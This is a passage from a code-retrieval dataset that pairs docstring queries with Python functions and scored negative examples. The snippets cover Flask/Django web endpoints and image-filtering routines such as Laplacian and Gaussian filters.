{0}:\\n{1}\".format(current_user.first_name, void_message)\n else:\n void_message_html = \"\"\n\n request_date = \"{0:02d}/{1:02d}/{2:04d}\".format(request_details[\"request_date\"][\"month\"],\n request_details[\"request_date\"][\"day\"],\n request_details[\"request_date\"][\"year\"])\n\n email_subject = \"Reimbursement Request Voided\"\n email_body = app_constants.EMAILS[\"void_request\"][\"text\"].format(\n request_date,\n request_details[\"requester\"][\"first_name\"],\n request_details[\"requester\"][\"last_name\"],\n void_message, request_details[\"short_description\"],\n request_details[\"pay_to\"][\"name\"], request_details[\"pay_to\"][\"email\"],\n request_details[\"total_amount\"], \"{0}mavapps/\".format(URL_FULL_PATH))\n email_body_html = app_constants.EMAILS[\"void_request\"][\"html\"].format(\n request_date,\n request_details[\"requester\"][\"first_name\"],\n request_details[\"requester\"][\"last_name\"],\n void_message_html, request_details[\"short_description\"],\n request_details[\"pay_to\"][\"name\"], request_details[\"pay_to\"][\"email\"],\n request_details[\"total_amount\"], \"{0}mavapps/\".format(URL_FULL_PATH))\n\n if SRV != \"prod\":\n emails = self.__TEST_EMAILS__\n else:\n emails = [[\"{0} {1}\".format(request_details[\"requester\"][\"first_name\"], request_details[\"requester\"][\"last_name\"]), request_details[\"requester\"][\"email\"]]] \\\n + accountant_emails + self.__PROD_EMAILS__\n\n self.mailer.send_mail(emails, email_subject, email_body, email_body_html, from_name=\"CSE Reimbursement App\")\n\n return jsonify({\"success\": True, \"type\": \"success\", \"message\": \"Request voided successfully.\"})\n except Exception as e:\n print(e)\n return abort(400)", "def __call__(self, request):", "def protect_endpoint():\n pass", "def test_lti_rest_non_get(self):\r\n DISALLOWED_METHODS = (\"POST\", \"PUT\", \"DELETE\", \"HEAD\", \"OPTIONS\") # pylint: disable=invalid-name\r\n for method in DISALLOWED_METHODS:\r\n request = mock.Mock()\r\n request.method = method\r\n response = get_course_lti_endpoints(request, self.course.id.to_deprecated_string())\r\n self.assertEqual(405, response.status_code)", "def register_controllers(app: FastAPI) -> None:\n app.include_router(base.router)\n app.include_router(checks.router, prefix=\"/checks\", tags=[\"checks\"])", "def index():\n endpoints = []\n for api_endpoint in app.url_map.iter_rules():\n if api_endpoint.rule.startswith('/api'):\n url = api_endpoint.rule\n methods = api_endpoint.methods\n endpoints.append((url, str(methods)))\n return jsonify(endpoints)", "def __call__(self, req):\n return self._router", "def test_GET(self):\n if not self.url:\n return\n response = self.client.get(self.url, {}, format='json')\n self.assertIn(response.status_code, [status.HTTP_405_METHOD_NOT_ALLOWED,\n status.HTTP_401_UNAUTHORIZED])", "def unknown_method(self, response):\n raise NoData", "def api_root(request, format=None):\n return Response({\n 'judges' : reverse('user-list',request=request),\n 'pilots': reverse('pilot-list', request=request),\n 'marks': reverse('mark-list', request=request),\n 'results' : reverse('results-detail', request=request),\n })", "def test_unauthenticated_resource_allowed(self):\n raise NotImplementedError # FIXME", "def get(self, request, *args, **kwargs):\n verify_secure(request)\n return super().get(request, args, kwargs)", "def get(self, request, *args, **kwargs):\n verify_secure(request)\n return super().get(request, args, kwargs)", "def get(self, request, *args, **kwargs):\n verify_secure(request)\n return super().get(request, args, kwargs)" ]
[ "0.55937976", "0.55937976", "0.55937976", "0.55937976", "0.55937976", "0.5476229", "0.5457845", "0.5313464", "0.5251401", "0.5202117", "0.5182233", "0.5172451", "0.51495206", "0.51472974", "0.51144993", "0.5110918", "0.5094427", "0.50860524", "0.50750285", "0.5068474", "0.5059303", "0.5054207", "0.5053128", "0.5042909", "0.504271", "0.5042243", "0.5023599", "0.50196683", "0.5013515", "0.50109804", "0.49971032", "0.49892017", "0.4969839", "0.4969839", "0.49648565", "0.49485943", "0.49455228", "0.49446857", "0.49434412", "0.49376577", "0.49302652", "0.49143335", "0.48972073", "0.48935014", "0.48930275", "0.48880643", "0.4887957", "0.48854864", "0.48713237", "0.48680308", "0.48622507", "0.48606095", "0.48503816", "0.48472077", "0.48421395", "0.483846", "0.48348936", "0.48302412", "0.48260525", "0.48108485", "0.48086622", "0.48048627", "0.48048547", "0.48009956", "0.47948772", "0.47898114", "0.47800022", "0.47776252", "0.47694263", "0.4760907", "0.47527623", "0.47456428", "0.47424775", "0.47416496", "0.47374028", "0.4737229", "0.4734747", "0.47338772", "0.47314012", "0.47306627", "0.47257647", "0.47236693", "0.47182372", "0.47171426", "0.47167963", "0.4716439", "0.4713751", "0.47132885", "0.47051653", "0.47034383", "0.4702514", "0.47001204", "0.4700047", "0.4698964", "0.4693367", "0.46820664", "0.4679647", "0.46749556", "0.46696687", "0.46696687", "0.46696687" ]
0.0
-1
This creates the generator object yielding squares of the number
def generate_square_number(square_limit): for i in range(0,square_limit): yield i**2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def square_numbers_2(nums):\n for i in nums:\n yield(i*i)", "def perfect_sq_seq_gen(num):\n for i in range(num):\n yield i ** 2", "def gensquares(n):\n for number in my_range.my_range(n): # note that we are NOT calling range(N), we implemented our own my_range() generator\n yield number**2", "def my_squares(iters):\n out = [i ** 2 for i in range(iters)]\n return out", "def my_squares(iters):\n out = []\n for i in range(iters):\n out.append(i ** 2)\n return out", "def test_nested_gen(n):\n for a in range(n):\n yield (b for b in range(a))", "def square_nums(number_list):", "def get_squares(n):\n\n return sum([i * i for i in range(n)])", "def _mc_gen():\r\n n = 1\r\n while True:\r\n yield n\r\n n += 1", "def numbers():\n for number in range(1, 76):\n yield number", "def gen_num(lim=10000):\n n = 1\n yield 2\n yield 3\n while 6 * n + 1 <= lim:\n yield 6 * n - 1\n yield 6 * n + 1\n n += 1", "def square(original_number):\n running_total = 0\n for counter in range(original_number):\n running_total = running_total + original_number\n return running_total", "def sum_of_squares(n, k, zeros=False):\n yield from power_representation(n, 2, k, zeros)", "def multiple_gen(modulus):\n count = 1\n while True:\n yield modulus * count\n count += 1", "def gen_primes():\n\n n = 1\n while True:\n while not isPrime(n):\n n += 1\n\n yield n\n n += 1", "def square():\r\n for _ in range(4):\r\n t.fd(200)\r\n t.rt(90)", "def square(n):\n\n result = [num * num for num in range(n)]\n\n return result[1:]", "def task5(count):\n number_1, number_2 = 1, 1\n for _ in range(count):\n yield number_1\n number_1, number_2 = number_2, number_1 + number_2", "def square(num):\n return num * num", "def square_number(number: int) -> int:\n return number * number", "def squares():\n return [i for i in xrange(11, 89) if 1 <= (i % 10) <= 8]", "def task_10_generator_of_simple_numbers() -> Generator[int, None, None]:\n def is_num_simple(n):\n \"\"\"\n Return: True if n is a simple number or False if it is not\n \"\"\"\n for i in range(n, 1, -1):\n if n % i == 0 and i < n and n != 1:\n return False\n return True\n\n # generator part\n n = 2\n while n < 200:\n if is_num_simple(n):\n yield n\n n = n + 1", "def generator(factor: int, test: typing.Callable[[int], bool],\n start: int) -> typing.Iterator[int]:\n value = start\n while True:\n value = (value * factor) % 2147483647\n if test(value):\n yield value", "def square(numbers):\n\n # Needs only one argument\n newlist = []\n for num in numbers:\n newlist.append(num*num)\n return newlist", "def prime_generator():\n i = 0 # prime numbers counter\n num = 0 # current number\n while True:\n num += 1\n if is_prime(num):\n i += 1\n yield i, num", "def main(start, end):\n for i in range(start, end+1):\n yield i, square(i), cube(i)", "def square(numbers):\n\n # Needs only one argument\n\n return numbers[0] ** 2", "def g_iter(n):\n \"*** YOUR CODE HERE ***\"\n if n <= 3:\n return n\n else:\n i = 3\n x, y, z = 1, 2, 3\n new = 1\n while i < n:\n new = z + (2*y) + (3*x)\n x, y, z = y, z, new \n i += 1\n return new", "def square(num):\n square = num ** 2\n return square", "def generate():\n j = [2]\n i = 3\n while i:\n if is_prime(i):\n j.append(i)\n yield [j, j[-1]]\n i += 2", "def xrndSphere(n):\n for i in xrange(n):\n yield rndSphere()", "def test_sum_of_yields(n):\n x = 0\n x += yield (0, x)\n x += yield (0, x)\n yield (1, x)", "def my_square(x):\n return x ** 2", "def make_square(x, size):\n return [ [x, -size/2, size/2],\n\t\t\t [x, size/2, size/2],\n [x, size/2, -size/2],\n\t\t\t [x, -size/2, -size/2]]", "def squared(num_list):\n new_list=[]\n for num in num_list:\n sq_num=pow(num,2)\n new_list.append(sq_num)\n return new_list", "def square(x):\n\n\treturn x * x", "def square(value):\n return value ** 2", "def generation(x, g):\n return int(x/g)", "def factor_gen(number):\n if number <= 0:\n raise ValueError(\"Not a valid number {}\".format(number))\n # O(sqrt(n)) sorted solution\n # For the unsorted solution, remove the queue and yield when found\n queue = []\n for f in count(1):\n if number != 1 and (f == 1 or f * f == number):\n yield f\n elif number <= f * f:\n yield from iter(queue)\n raise StopIteration\n elif number % f == 0:\n yield f\n queue.insert(0, number // f)", "def prime_generator() -> Iterator[int]:\n\n num = 2\n while True:\n if is_prime(num):\n yield num\n num += 1", "def exercise_gen(ret_val, times):", "def Pi(nmax, costheta):\r\n n = 2\r\n pi_n = 1\r\n pi_n_1 = 0\r\n yield pi_n\r\n while n <= nmax+1:\r\n newpi = (((2*n - 1) / (n - 1)) * costheta * pi_n - \r\n (n / (n - 1)) * pi_n_1)\r\n pi_n_1 = pi_n\r\n pi_n = newpi\r\n n = n + 1\r\n yield newpi", "def test_generator_method(self):\n for i in range(0, 4):\n yield self.try_odd, i", "def est_generator(limit=1000):\n last_guess = ZERO\n for i in range(limit):\n yield 1 + last_guess\n denom = last_guess + 2\n last_guess = 1 / denom", "def get_squares(x, y, width, height):\n return product(range(x+1, x+width+1), range(y+1, y+height+1))", "def gen_primes():\n\tyield 2\n\tyield 3\n\tprime_list = [2, 3]\n\twhile 1:\n\t\tnext = prime_list[-1] + 2\n\t\ti = 0\n\t\twhile i < len(prime_list):\n\t\t\tif next%prime_list[i] == 0:\n\t\t\t\tnext+=2\n\t\t\t\ti=0\n\t\t\telse:\n\t\t\t\ti+=1\n\t\tprime_list.append(next)\n\t\tyield next", "def generator():\n mygenerator = (x for x in range(3))\n for element in mygenerator:\n print 'poprve = ', element\n\n for element in mygenerator:\n print 'podruhe = ', element", "def floating_point_generator():\n i = 0\n while True:\n yield str((i % 5) * 1.1)\n i += 1", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def __iter__(self):\n return self._product_generator()", "def square():\n square_list = set()\n for seed_value in range(1, 101):\n square_list.add(int(math.pow(seed_value, 2)))\n return set(square_list)", "def test_gen_expr_maths() -> None:\n # Sum of squares\n squares_generator: Generator[int, None, None] = (i * i for i in range(10))\n assert sum(squares_generator) == sum((1, 4, 9, 16, 25, 36, 49, 64, 81))\n\n # Dot product\n x_vector: Tuple[int, int, int] = (1, 3, 5)\n y_vector: Tuple[int, int, int] = (2, 4, 6)\n assert sum(x * y for x, y in zip(x_vector, y_vector)) == 44", "def calcSpacings(self, n):\n\n first = next = (n) / float(n + 1)\n for i in range(n):\n yield (next, 1 - next)\n next = first - (1 - next)", "def triangle_numbers():\n counter, tri_number = 1, 1\n while True:\n yield tri_number\n counter += 1\n tri_number += counter", "def sum_of_squares(n):\n result = i = 0\n while i < n:\n result += i\n i += 1\n return result", "def rounds(self):\n if self.round_number > 0:\n for i in range(self.round_number):\n yield Round(i + 1)", "def my_square2(x):\n\treturn(x * x)", "def primes():\n yield 2\n found_primes = [2]\n a = 3\n while True:\n for p in found_primes:\n if p**2 > a:\n found_primes.append(a)\n yield a\n a += 2\n break\n elif a % p == 0:\n a += 2\n break", "def digit_generator(N=1_000_000):\n i = 0\n number = 1\n while N > i:\n for _i in str(number):\n yield _i\n i += 1\n number += 1", "def square( x ):\n return x * x", "def __init__(self):\n self.square_size = 3 # large squares on a side\n self.size = self.square_size**2 # squares on a side\n numbers = self.numbers = tuple(range(1, self.size + 1))\n rows = self.rows = range(self.size)\n cols = self.cols = range(self.size)\n self.values = {(r,c): numbers for r in rows for c in cols}\n self.number_strings = '.' + ''.join(str(x) for x in self.numbers)", "def h():\r\n x,y = 1,1\r\n while True:\r\n yield x\r\n x = x + (y)*(-1)**y\r\n y = y + 1", "def square(x):\n return x * x", "def square(x):\n return x*x", "def prime_generator():\r\n for i in itertools.count(start=1):\r\n for j in ((6 * i) - 1, (6 * i) + 1):\r\n if is_prime(j): yield(j)", "def __mul__(self, o): \n return MoebGen(self._a * o.a + self._b * o.c, self._a * o.b + self._b * o.d, \n self._c * o.a + self._d * o.c, self._c * o.b + self._d * o.d)", "def square_numbers_1(nums):\n result = []\n for i in nums:\n result.append(i*i)\n return result", "def square(n):\n\n my_CRLF = '\\n'\n return_value = ''\n for _ in range(n):\n return_value += line(n) + my_CRLF\n return return_value", "def test_programs():\n yield 4, 4, 1\n yield 16, 12, 2", "def squareOfSum(num):\n return sum(range(1, num + 1)) ** 2", "def square(n: int) -> int:\n return int(n ** 2)", "def prime_gen():\n for i in memo_primes: yield i\n x = memo_primes[-1] + 1\n \n while True:\n if prime_with(x, memo_primes):\n yield x\n memo_primes.append(x)\n x += 1", "def sum_of_squares(n):\n sum = 0\n\n for i in range(0,n):\n sum += i*i\n\n return sum", "def new_generator(self):\n return self.generator_function(*self.args, **self.kwargs)", "def generate_generator(self, seed=None):\n if seed is None:\n seed = self._seed\n scalar = find_integer(increment_seed(seed), self._bits)\n x = None\n for x in self._field:\n if (x ** 3 + self._a * x + self._b).is_square():\n break\n y = (x ** 3 + self._a * x + self._b).sqrt()\n y = ZZ(min(y, self._p - y))\n point = scalar * self.curve()(x, y)\n self._generator = point[0], point[1]", "def test_generator_inline(self):\n def test_odd(v):\n assert v % 2\n for i in range(0, 4):\n yield test_odd, i", "def pow2(limit):\n i = 0\n bin_num = 1\n while bin_num <= limit:\n yield bin_num\n i += 1\n bin_num = 2 ** i", "def generators(n):\n return [g for g in zn_star(n)\n if is_generator_in_zn(g, n)]", "def integers():\n i = 1\n while True:\n yield i\n i = i + 1", "def integers():\n i = 1\n while True:\n yield i\n i = i + 1", "def my_generator(n):\n print(\"Hello world! I'm a generator.\")\n i = 1\n try:\n while True:\n yield \"I generated %d\" % (i * n)\n i += 1\n except GeneratorExit:\n print(\"Generator closed at i=%d\" % i)", "def square(n):\r\n squared = n ** 2\r\n print (\"%d squared is %d.\" % (n, squared)) ## გიო: შეცდომას აგდებდა სანამ ფრჩხილებში არ ჩავსვი\r\n return squared", "def generator(self):\n return [None, 1]", "def primes():\n yield 2\n candidate = 3\n while True:\n for i in range(3, int(sqrt(candidate)) + 1, 2):\n if (candidate % i) == 0:\n break\n else:\n yield candidate\n candidate += 2", "def primes():\n yield 2\n candidate = 3\n while True:\n for i in range(3, int(sqrt(candidate)) + 1, 2):\n if (candidate % i) == 0:\n break\n else:\n yield candidate\n candidate += 2", "def square_and_multiply(x, exponent, n):\n result = 1\n while exponent > 0:\n if exponent % 2:\n result = (result * x) % n\n x = (x * x) % n\n exponent = exponent // 2\n return result", "def square(i, j):\n return map(sq_start, [i, j, i + 1, j + 1])", "def get_primes(lower: int, upper: int) -> typing.Generator[int, None, None]:\r\n for num in range(lower, upper + 1):\r\n if num > 1:\r\n for i in range(2, int(math.sqrt(num)) + 1):\r\n if num % i == 0:\r\n break\r\n else:\r\n yield num", "def in_square():\n return np.random.random_sample(size=2)", "def gen(self, n=0):\n if n != 0:\n raise IndexError(\"n must be 0\")\n return ComplexNumber(self, 0, 1)", "def squares(upper=10**5):\n nums = [True] * (upper + 1)\n nums[0] = False\n for i in range(2, (upper + 3) / 2):\n sq = i * i\n for j in range(sq, upper + 1, sq):\n nums[j] = False\n return nums", "def sum_of_squares(n):\n return (n * (n+1) * (2*n + 1)) / 6", "def square2(x):\n return x * x", "def _random_generate_bernstein_ ( fun , num ) :\n xmn = fun.xmin ()\n xmx = fun.xmax ()\n ymx = max ( fun.bernstein().pars() )\n i = 0 \n while i < num : \n x = _uniform_ ( xmn , xmx ) \n y = _uniform_ ( 0 , ymx )\n v = fun ( x )\n if v >= y :\n i+= 1 \n yield x", "def gen_sequence(a, b, c):\n i = 1\n while True:\n yield a * i**2 + b * i + c\n i += 1", "def possible_sums(numbers: Iterator[SnailfishNumber]) -> Iterator[SnailfishNumber]:\n yield from (a + b for a, b in permutations(numbers, 2))", "def square(x):\n return x**2", "def it(t, variant=0, min_q=3, max_q=sage.all.infinity, primes_only=False):\n for q in sage.all.primes(min_q, max_q) if primes_only else prime_powers(min_q, max_q):\n yield NormGraph(q, t, variant)", "def g_iter(n):\n \"*** YOUR CODE HERE ***\"\n if n < 4:\n return n\n else:\n g1 = 1\n g2 = 2\n g3 = 3\n i = 3\n while(i < n):\n i += 1\n t = g3 + 2*g2 + 3*g1\n g1 = g2\n g2 = g3\n g3 = t\n return g3", "def nextpow2(i):\n n = 1\n while n < i:\n n *= 2\n return n" ]
[ "0.76812726", "0.7570587", "0.7127406", "0.7013921", "0.6935942", "0.6566116", "0.65498954", "0.65378404", "0.65034443", "0.6499686", "0.64733166", "0.6452493", "0.6364364", "0.6352053", "0.6324538", "0.63203084", "0.62623084", "0.6218521", "0.6207027", "0.6205454", "0.619938", "0.6184534", "0.607988", "0.6055128", "0.60494274", "0.60432804", "0.60318965", "0.59891254", "0.59867", "0.5971077", "0.5945609", "0.5936474", "0.5914042", "0.59051156", "0.5901671", "0.588901", "0.5886832", "0.58738565", "0.58736765", "0.5872506", "0.5868297", "0.5866551", "0.5864959", "0.5856865", "0.5850458", "0.5849793", "0.5834694", "0.5825616", "0.5823485", "0.5814875", "0.5800164", "0.57945156", "0.57918084", "0.57878923", "0.5781809", "0.5778792", "0.5778564", "0.5774946", "0.57619286", "0.57581013", "0.5757171", "0.57562006", "0.57478774", "0.5736855", "0.5728195", "0.5728079", "0.57194453", "0.5717822", "0.57149404", "0.570092", "0.56953967", "0.5692247", "0.5687921", "0.5664108", "0.56531894", "0.5646731", "0.56453013", "0.5645104", "0.5640075", "0.5640075", "0.5635316", "0.5630844", "0.56305206", "0.5630275", "0.5630275", "0.56292", "0.56236255", "0.5613654", "0.5606165", "0.559097", "0.55908376", "0.55890465", "0.5588625", "0.5582088", "0.55815345", "0.5574861", "0.5572216", "0.5561515", "0.5560066", "0.55557823" ]
0.7852594
0
r"""One could also use the Laplacian of Gaussian formula to design the filter.
def laplacian_1d(window_size) -> torch.Tensor: filter_1d = torch.ones(window_size) filter_1d[window_size // 2] = 1 - window_size laplacian_1d: torch.Tensor = filter_1d return laplacian_1d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filter(self, op=GaussianFilter):\n\n if self._verbose > 0:\n print(\"Filtering...\")\n\n # Import from utils specified params.\n params = get_filtering_params()\n\n negative = self.image_raw - op(sigma=params['sigma_bgd']).convolve(self.image_raw)\n\n self.image_filtered = op(sigma=params['sigma_spots']).convolve(negative)", "def Gauss_filter(data, sigma=(0,2,2), mode='wrap'): \n import scipy.ndimage.filters as flt\n return flt.gaussian_filter(data, sigma=sigma, mode=mode)", "def gaussian_filter(x):\n return _gaussian_filter(x, 3)", "def apply_filter(self, image):\n gauss_low = cv2.GaussianBlur(image, ksize=(0,0), sigmaX=self._sigma_low , sigmaY=self._sigma_low)\n gauss_high = cv2.GaussianBlur(image, ksize=(0,0), sigmaX=self._sigma_high, sigmaY=self._sigma_high)\n\n filtered_image = gauss_low - gauss_high\n\n return normalize(filtered_image, nb_bits=8)", "def get_gaussian_low_pass_filter(shape, cutoff, order):\n \n print(\"gaussian_low_pass_filter = \")\n print(\"cutoff: \",cutoff)\n print(\"order: \",order)\n filter = np.zeros(shape)\n\n for i in range(shape[0]):\n for j in range(shape[1]):\n D = np.sqrt((i - (shape[0] / 2)) ** 2 + (j - (shape[1] / 2)) ** 2)\n\n filter[i, j] = math.exp(-D ** 2 / (2 * (cutoff ** 2)))\n\n # return filter\n return process_filter(image, filter)", "def build_filter(n, sigma):\n filter_ = np.zeros((n,n))\n\n begin = n//2\n\n for i in range(n):\n for j in range(n):\n val = ((i-begin)**2 + (j-begin)**2)**0.5\n filter_[i][j] = gaussian(val, sigma)\n\n return filter_", "def get_gaussian_low_pass_filter(self, shape, cutoff):\r\n P = shape[0]\r\n Q = shape[1]\r\n mask = np.zeros((P, Q))\r\n for u in range(P):\r\n for v in range(Q):\r\n dist = (((u - (P / 2)) ** 2) + ((v - (Q / 2)) ** 2)) ** (1 / 2)\r\n\r\n mask[u][v] = math.exp((-dist ** 2) / (2 * (cutoff ** 2)))\r\n\r\n return mask", "def custom_filter(image: Image) -> Image:\n image = image.filter(ImageFilter.Kernel(\n size=(3, 3), kernel=(1, 0, 1, 0, 0, 0, 1, 0, 1)))\n return image", "def get_gaussian_low_pass_filter(self, shape, cutoff):\n from numpy import exp\n \n mask = zeros(shape)\n row_size, col_size = shape[0], shape[1]\n center_row, center_col = row_size/2 , col_size/2\n for r in range(0, row_size):\n for c in range(0, col_size):\n freq_dist = sqrt( (r-center_row)**2 + (c-center_col)**2 )\n mask[r,c] = (exp(-(freq_dist**2)/(cutoff*2)**2)) if freq_dist > cutoff else 1.0\n\n return mask", "def log_filter(img, noData):\n img1 = np.float64(img.copy())\n img1 = sf.laplace( img1, mode='constant')\n if np.sum(img<=noData) > 0 : #zero the filtered image at data-nodata boundaries\n mask = np.float64(img.copy())\n mask[:] = 1.\n mask[img<=noData] = 0.0\n mask=sf.laplace(mask, mode='constant')\n img1[mask != 0.] = 0. # set the borders to zero\n img1 = sf.gaussian_filter(img1, (1.4, 1.4), mode='constant')\n return img1", "def filter(data_raw: dict, sigma: int=1) -> dict:\n data = Filter.__band_filter(data_raw, lowFreq=2, highFreq=70, filterType='bandstop')\n data = Filter.__laplacian_filter(data,sigma) #Need to write test for this once its complete\n return data", "def gaussian_filter(size,sigma=-1):\n\n if sigma == -1:\n sigma = np.sqrt(size)\n\n filter = np.zeros((size,size))\n\n for i,j in it.product(range(size),range(size)):\n x = j-size//2\n y = i-size//2\n filter[i,j] = 1/(2*np.pi*sigma**2) * np.exp(-(x**2+y**2)/(2*sigma**2))\n\n filter = filter/filter[0,0]\n filter = filter/filter.sum()\n\n return filter", "def filterf(self):\n from scipy.ndimage.filters import gaussian_filter as gf\n self._obj['u'] = xr.DataArray(gf(self._obj['u'],1),dims=('x','y'))\n self._obj['v'] = xr.DataArray(gf(self._obj['v'],1),dims=('x','y'))\n return self._obj", "def smooth_scipy(self, mri_data):\n\n # image dimension\n if hasattr(mri_data.img_header, 'info'):\n dx, dy, dz = np.abs(mri_data.img_header.info['DELTA'])\n elif hasattr(mri_data.img_header, 'get_zooms'):\n dx, dy, dz = mri_data.img_header.get_zooms()[:3]\n else:\n self.errmsg(\"No voxel size information in mri_data header\")\n\n # Set gaussian sigma in image dimension\n sigma = (self.blur_fwhm / np.array((dx, dy, dz))) / 2.354820\n imgdata = mri_data.img_data.astype(np.float64)\n\n # Apply mask\n if hasattr(self, 'maskV'):\n imgdata[~self.maskV] = 0\n\n # Apply Gaussian filter\n filt_img = gaussian_filter(imgdata, sigma, mode='constant')\n\n if hasattr(self, 'maskV'):\n # Adjust voxels with out of the mask (0) convolution\n aux_img = np.ones_like(imgdata)\n aux_img[~self.maskV] = 0\n filt_aux_img = gaussian_filter(aux_img, sigma, mode='constant')\n filt_img[self.maskV] /= filt_aux_img[self.maskV]\n\n return filt_img.astype(mri_data.img_data.dtype)", "def fake_gaussian(img, vertical_horizontal_sigma, iter=3):\n sigma_vertical, sigma_horizontal = vertical_horizontal_sigma\n h_blured = box_filter1d(img, sigma_horizontal, horizontal=True, iter=iter)\n blured = box_filter1d(h_blured, sigma_vertical, horizontal=False, iter=iter)\n return blured", "def apply_filter(image: np.ndarray) -> np.ndarray:\n # choose filters to apply\n return clahe(image)", "def gaussian_filter(img,f=5,K=1,var=1):\n i_x, i_y = np.shape(img) # image size\n radi = f//2 # window radius\n\n # create gaussian kernel\n def gaussian_kernel(f,K,var):\n \n # create coordinate information \n if f//2 == 0:\n x = np.linspace(-radi,radi,f+1)\n y = np.linspace(-radi,radi,f+1)\n x = np.delete(x, radi)\n y = np.delete(y, radi)\n else:\n x = np.linspace(-radi,radi,f)\n y = np.linspace(-radi,radi,f)\n\n m_x, m_y = np.meshgrid(x,y) # create coordinate\n r_gauss = m_x**2 + m_y**2 # distance to origin\n gauss = K*(np.exp(-r_gauss/(2*(var**2)))) # create kernel\n return gauss/gauss.sum()\n \n #mirror padding\n def mir_padding(img,f):\n img_p = np.zeros((i_x+2*radi,i_y+2*radi)) #create padding image\n img_p[radi:i_x+radi,radi:i_y+radi] = img #throw original image to padding image\n img_p[0:radi,radi:i_y+radi] = img[radi-1::-1,:] # padding top rows\n img_p[-radi::1,radi:i_y+radi] = img[-1:-radi-1:-1,:] # padding bottom rows\n img_p[radi:i_x+radi,0:radi] = img[:,radi-1::-1] # padding left column\n img_p[radi:i_x+radi,-radi::1] = img[:,-1:-radi-1:-1] # padding right column\n for i in range(f):\n img_p[0:radi,i] = img[radi-1-i,radi-1::-1] # padding upper-left corner\n img_p[0:radi,-i] = img[radi-1-i,-radi::1] # padding upper-righ corner\n img_p[-1:-radi-1:-1,i] = img[-radi+i,radi-1::-1] # padding lower-left corner\n img_p[-1:-radi-1:-1,-i] = img[-radi+i,-radi::1] # padding lower-right corner\n return img_p\n\n img_p = mir_padding(img,f) # create padding image\n g_kernel = gaussian_kernel(f,K,var) # create gaussian kernel\n\n #seperate kernel\n E = g_kernel[0,0]\n c = g_kernel[:,0]\n wT = np.reshape(g_kernel[0,:]/E,(f,1))\n\n gauss_image = np.zeros([i_x,i_y]) # create gauss image\n temp_image = np.zeros([i_x,i_y]) # create temp image for two 1D convolution\n old_c_sum = c.sum() # calculate sum of c before modification\n\n # if elements of kernel are located within area of padding, substitute value with 0\n # calculate new value base on ratio between sum before and after modification\n for j in range(i_y):\n y_bound = i_y - j\n mod_c = c.copy()\n if j < radi:\n mod_c[0:radi-j] = 0 \n new_c_sum = mod_c.sum()\n mod_c = mod_c*old_c_sum/new_c_sum \n if j > i_y - radi - 1:\n mod_c[-1:-radi+y_bound-1:-1] = 0 \n new_c_sum = mod_c.sum()\n mod_c = mod_c*old_c_sum/new_c_sum \n for i in range(i_x):\n temp_image[i,j] = np.sum(img_p[i+radi,j:j+f]*mod_c)\n\n temp_image = mir_padding(temp_image,f) # create padding temp image for next 1D convolution\n old_wT_sum = wT.sum() # calculate sum of wT before modification\n\n # if elements of kernel are located within area of padding, substitute value with 0\n # calculate new value base on ratio between sum before and after modification\n for i in range(i_x):\n x_bound = i_x - i\n mod_wT = wT.copy()\n if i < radi:\n mod_wT[0:radi-i] = 0 \n new_wT_sum = mod_wT.sum()\n mod_wT = mod_wT*old_wT_sum/new_wT_sum \n if i > i_x - radi - 1:\n mod_wT[-1:-radi+x_bound-1:-1] = 0 \n new_wT_sum = mod_wT.sum()\n mod_wT = mod_wT*old_wT_sum/new_wT_sum \n for j in range(i_y):\n gauss_image[i,j] = np.sum(temp_image[i:i+f,j+radi]*mod_wT.T)\n\n return gauss_image", "def filter_gradient(self):\n error = self.error()\n error_shape = error.shape[1:3]\n input_ = self.get_cache('input')\n h = input_.shape[1]\n w = input_.shape[2]\n # TODO: check that this padding is correct. I am not sure it gets it right when the number of 0s to add is odd.\n pad_l, pad_t = (error_shape[0] - 1) // 2, (error_shape[1] - 1) // 2\n pad_r, pad_b = (error_shape[0] - 1) - pad_l, (error_shape[1] - 1) - pad_t\n padded_input = np.pad(input_, ((0, 0), (pad_l, pad_r), (pad_t, pad_b), (0, 0)), 'constant')\n # TODO: this assumes 'same' padding. support other types.\n # TODO: I wanted to use np.from_function but kept getting an IndexError, so we'll use a nested for loop for now\n grads = np.zeros(self.filter.shape)\n for m in range(grads.shape[0]):\n for n in range(grads.shape[1]):\n for k in range(grads.shape[2]):\n for r in range(grads.shape[3]):\n grads[m, n, k, r] = np.sum(error[:, :, :, r] * padded_input[:, m: m + h, n: n + w, k])\n return grads", "def log_filter(stack, sigma):\n stack_cp = stack.astype(np.int16)\n gauss = ndi.filters.gaussian_filter(stack_cp, sigma=sigma)\n log = ndi.filters.laplace(gauss)\n return log", "def scipy_smooth(img, sigma=5):\n return ndimage.gaussian_filter(img, sigma=sigma)", "def apply_gaussian(X, sigma):\n return np.array([ndimage.gaussian_filter(x, sigma) for x in X])", "def gaussian_filter(stddev, array):\n\n return astropy.convolution.convolve(\n array, astropy.convolution.Gaussian2DKernel(stddev))", "def compute_filter_ips_self(lal_filters, spec_corr, psd=None):\n return numpy.array([lalburst.ExcessPowerFilterInnerProduct(f, f, spec_corr, psd) for f in lal_filters])", "def createDefaultFilterbank(window):\n # Gaussians:: G1 = N(0, 1), G2 = N(0, 2), G3 = N(0, 4)\n # Laplacian of Gaussians:: LoG1 = Lap(N(0, 1)), LoG2=Lap(N(0, 2)), LoG3=Lap(N(0, 4)), LoG4=Lap(N(0, 8))\n # Derivative of Gaussian (x):: Div1xG1 = d/dx N(0,2), Div1xG2=d/dx N(0,4)\n # Derivative of Gaussian (y): Div1yG1 = d/dy N(0,2), Div1yG2=d/dy N(0,4)\n \n G1 = gaussian_kernel(window, window, 1)\n G2 = gaussian_kernel(window, window, 2)\n G3 = gaussian_kernel(window, window, 4)\n \n # see http://homepages.inf.ed.ac.uk/rbf/HIPR2/log.htm\n LoG1 = laplacianOfGaussian_kernel(window, window, 1)\n LoG2 = laplacianOfGaussian_kernel(window, window, 2)\n LoG3 = laplacianOfGaussian_kernel(window, window, 4)\n LoG4 = laplacianOfGaussian_kernel(window, window, 8)\n \n dx_G1 = gaussian_1xDerivative_kernel(window, window, 2)\n dx_G2 = gaussian_1xDerivative_kernel(window, window, 4)\n \n dy_G1 = gaussian_1yDerivative_kernel(window, window, 2)\n dy_G2 = gaussian_1yDerivative_kernel(window, window, 4)\n \n return np.array([G1, G2, G3, LoG1, LoG2, LoG3, LoG4, dx_G1, dx_G2, dy_G1, dy_G2])", "def gaussian_filter(self, sigma):\n\n mask = self.get_weighted_mask()\n 